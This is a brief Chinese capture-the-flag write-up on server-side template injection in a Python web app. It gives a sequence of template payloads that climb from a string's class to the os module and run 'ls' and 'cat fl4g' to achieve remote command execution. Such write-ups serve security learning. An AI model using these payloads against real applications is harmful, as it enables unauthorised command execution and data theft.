本文主要是介绍Web_python_template_injection SSTI printer方法,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
这题挺简单的 就是记录一下不同方法的rce
python_template_injection
ssti了
{{''.__class__.__mro__[2].__subclasses__()}}
然后用脚本跑可以知道是 71
{{''.__class__.__mro__[2].__subclasses__()[71]}}
然后直接 init
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__}}
存在os
直接通过os rce 了
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}
这篇关于Web_python_template_injection SSTI printer方法的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!